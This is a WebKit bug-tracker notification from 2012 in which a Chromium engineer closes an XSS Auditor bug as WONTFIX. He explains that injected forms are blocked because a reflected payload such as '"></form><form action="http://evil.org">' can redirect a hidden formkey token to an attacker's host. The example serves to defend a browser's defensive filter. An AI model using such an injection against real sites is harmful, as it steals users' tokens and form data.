[Webkit-unassigned] [Bug 72585] XSS Auditor : <form> action is blocked even if it is not a JavaScript URL
bugzilla-daemon at webkit.org
Mon Feb 27 10:36:22 PST 2012
https://bugs.webkit.org/show_bug.cgi?id=72585
Thomas Sepez <tsepez at chromium.org> changed:
What          |Removed  |Added
----------------------------------------------------------------------------
Status        |NEW      |RESOLVED
Resolution    |         |WONTFIX
--- Comment #3 from Thomas Sepez <tsepez at chromium.org> 2012-02-27 10:36:21 PST ---
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam suggests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when the page contains:
<form action="http://good.com">
<input type="text" name="quantity" value="2">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
and the "quantity" input element contains an injection, and we reflect from the URL say
...?quantity="></form><form action="http://evil.org">
resulting in page:
<form action="http://good.com">
<input type="text" name="quantity" value=""></form><form action="http://evil.org">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
So when the user hits submit, we steal his formkey token (or other information from input fields).
Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.
Thanks heaps.